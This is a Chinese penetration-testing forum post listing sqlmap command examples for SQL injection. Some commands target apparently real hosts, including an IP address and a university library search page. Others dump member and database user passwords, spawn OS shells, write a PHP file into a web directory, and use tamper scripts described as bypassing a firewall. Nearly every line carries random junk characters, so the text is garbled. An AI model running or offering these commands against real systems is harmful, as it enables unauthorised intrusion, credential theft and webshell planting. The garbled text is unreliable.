中国网络渗透测试联盟

标题: sqlmap使用实例 [打印本页]

作者: admin    时间: 2017-5-19 17:03
标题: sqlmap使用实例
/pentest/database/sqlmap
2 o+ C7 s% W- e# m* [
" K- G* q9 ?, x! t) L! qupdate :::::>     in the folder   after  execute    following   order : svn update8 `( E) O3 G6 \! J8 C% ]" P& ^0 I1 w
& Z; \6 _! X& h) H
sqlmap.py -r 1.txt --current-db$ U' Z& A- ^( ~

3 z1 ]0 n* S3 T0 Bv 3 –dbms “MySQL” –technique U -p id –batch –tamper “space2morehash.py”
8 u5 D0 C3 Q3 Y2 _4 o" z9 O6 P, w, D4 E) K. T9 q8 _2 I
==================基本使用方法==========================elect (select concat(0x7e,0x27,username,0x3a,password,0x27,0x7e) from phpcms_member limit 0,1))
7 g7 R/ c# Z: i& `1 K6 x猜解数据库0 {/ N9 s7 E* b! e8 i
./sqlmap.py -u "injection-url" --dbs6 Q, R% G, h: a$ q, C
sqlmap.py -r 1.txt -v 3 --dbs --tamper "space2morehash.py"6 ]5 Y" L2 Y; G7 x: r
! }' W& q6 [5 g$ o6 s( p4 u
猜解表名6 C  ?7 h2 @. r
./sqlmap.py -u "injection-url" -D database_name --tables, u1 Q8 t5 I$ B" ?, @

2 Y, s. v" b, [. q( g2 Wsqlmap.py -r 1.txt -v 1 -D jsst --tables --batch --tamper "space2morehash.py"
* v4 N. Y. [' y8 u6 D! S: V. Ssqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member_info --columns --batch --tamper "space2morehash.py" ; f, {0 r, a+ Z/ |6 ~! U# R

# @/ |- f! J% n  q, D& ^! Usqlmap.py -r 1.txt -D mail -T F_domain -C F_email,F_password --dump0 C! h- p3 |3 w5 r  }- U

* X- k+ U. W/ n7 Msqlmap.py -r 1.txt -v 1 --os-shell --tamper "chardoubleencode.py"
5 Z; k# X; W+ D( Msqlmap.py -r 1.txt -v 3 --os-shell --tamper "chardoubleencode.py"
8 H3 M/ N" w5 b" A1 E" g' Msqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:\Bitnami\wampstack-5.4.29-0\apache2\htdocs\en\fckeditor\help888.php --tamper "chardoubleencode.py"
" P( T3 ]7 W2 c% y0 c0 _: |sqlmap.py -r 1.txt --dbms "Mysql" --os-shell --tamper "charunicodeencode.py"
2 ~3 M( ^5 e, b% \  L6 w% O+ c( P3 X% F# c8 ~- i2 q, t
sqlmap.py -u "http://121.15.0.227/en/list.php?catid=74" --os-shell -v3 --tamper "charunicodeencode.py"
- @- o/ E" m- j+ J# Isqlmap.py -r 1.txt -v 3 --sql-query "desc jsgen_member;" --batch --tamper "space2morehash.py"
0 q+ M, X" _; B: x% qsqlmap.py -r 1.txt -v 3 --sql-query "show create table jsgen_member;" --batch --tamper "space2morehash.py"
6 V: p+ J3 E8 f5 D" H' fsqlmap.py -r 1.txt -v 3 --sql-query "select user();" --batch --tamper "space2morehash.py"
8 `* G) }( n( O- k; F5 D4 ?3 w3 jsqlmap.py -r 1.txt -D jsst -T phpcms_member -C username,password --dump
4 [, G" ?' \# z% D/ d3 J0 [) [, d
. t0 L, k) Q! d% Y7 s0 m) csqlmap.py -r 1.txt -v 3 --dbs  --batch --tamper "space2morehash.py" 绕过防火墙了
" i: u, ?1 T5 Y* g# c9 \sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C ,userid,username,password, --dump --batch --tamper "space2morehash.py"
; y/ Y  O1 y# n) P* W' |. O
# i! y9 K. y3 c: D0 T6 G. gsqlmap.py -r 1.txt --dbms "Mysql" --tables -D "jsst"
, G' v) H( M$ [( ~, A# s猜解列名$ b3 k- F1 j- l7 z. F5 o' E: w
./sqlmap.py -u "injection-url" -D database_name -T table_name --columns
- Y2 L" y$ `) K9 t2 w5 U/ f( B3 L- A5 I2 c( J
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member --columns --batch --tamper "space2morehash.py"
: m2 i' ]9 z5 w( [/ h7 `sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_session --columns --batch --tamper "space2morehash.py"
: Q" P8 B; \2 |6 U" [sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C userid,groupid,username,password,touserid,point,modelid,email,areaid --dump --batch --tamper "charunicodeencode.py"
. [" O- Z, _5 i2 [) A* P
9 E8 I1 O: y( bsqlmap.py -u "http://cityusr.lib.cityu.edu.hk/jspui/simple-search?query=1" --batch --tamper "space2morehash.py"+ x  w0 t( z- G; b) S
&submit=Go
: [* a4 z0 @3 k7 R) j) A( Z/ d猜解值9 P/ K3 V& t9 u2 Z" c
./sqlmap.py -u "injection-url" -D database_name -T table_name -C column1,column2 --dump* v9 t" g  T% a, |2 g( J
========================================================
" g( @' }* R: t. _- J搜索表名中包括mana字符的( t4 @. k# @8 X: I& e
/sqlmap.py -u "injection-url" -T mana --search( L& Y4 {4 ^4 `, ~: p( i
返回一个交互式sql shell
- @" \4 I* i6 w6 M- i- c+ v/sqlmap.py -u "injection-url" --sql-shell
# k  s+ D6 h8 d0 }/ Y# L& p. W读取指定文件(需权限)
! V4 o) Y' \* J  G( x/sqlmap.py -u "injection-url" --file-read "c:\boot.ini"6 Z8 U" q2 w7 Y+ u/ j) h/ R" @, \
查看当前 用户 及 数据库 3 P% i# f0 F7 Y. [: d
/sqlmap.py -u "injection-url" --current-user --current-db
5 o* z( X. T) {6 f2 l4 ?* @本地文件 写入 远程目标绝对路径, O. D) k6 r1 w
/sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径$ v) Z( I8 F. m& k6 i
sqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:/Bitnami/wampstack-5.4.29-0/apache2/htdocs/en/fckeditor\help888.php --tamper "charunicodeencode.py"
' T  i9 N: ^% Z9 @$ N0 ^3 |1 ~9 h  F. ]8 a$ _
sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径1 V( m! n) }, y" K
查看某用的权限$ l- P; X* k; D5 b; r
/sqlmap.py -u "injection-url" --privileges -U root* u7 V, _8 `/ l! V7 z6 o
查看当前用户是否为dba
  Q7 a, E: h# @/sqlmap.py -u "injection-url" --is-dba
8 Q) u6 B0 J  f1 X* C读取所有数据库用户或指定数据库用户的密码
/ U7 G* Q+ O. X# E, \sqlmap.py -r 1.txt --users --passwords  n8 b4 Y9 }1 M% o0 h
sqlmap.py -r 1.txt -v 3 --users --passwords --batch --tamper "space2morehash.py" + E% r4 B& K, p1 C; n
7 ^# C& T1 q- [/ T6 u
/sqlmap.py -u "injection-url" --passwords -U root
7 O3 V, p* |6 H, G. t' A$ t; I. F/ \" B, c
--start&&--stop 与 --first&&--last 的区别
2 ^: A" R. x7 D5 V) ]0 z/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D phpcms -T phpcms_member --start=1 --stop=2 --dump   (--start=1 --stop=2 会列出第二条记录。。。。记录例如:0 1 2 3 ……)
1 h+ c1 D3 w; N, |0 t2 ]- T9 D/ z7 }
从字典中查找(属于暴利破解)存在的表(sqlmap/txt/common-tables.txt)或字段(sqlmap/txt/common-columns.txt)
4 Z9 ]+ z  c% I2 `4 u/ ?/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name --common-tables# l0 E0 A3 \* S, K& ^1 k6 W
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name -T table_name --common-columns
3 a' v* A& X2 F; X$ M% J: `# }
9 ]( F- v5 g& `) }% s' H- a- |执行sql语句,如查询@@datadir得到数据库路径(或者user()/database()等等……)
7 n  y# ]4 d5 U$ B+ j% ~. ^/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" --sql-query "select @@ip"9 O. t# U5 m* @. N

' o% F7 `$ p% L) ~- L




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2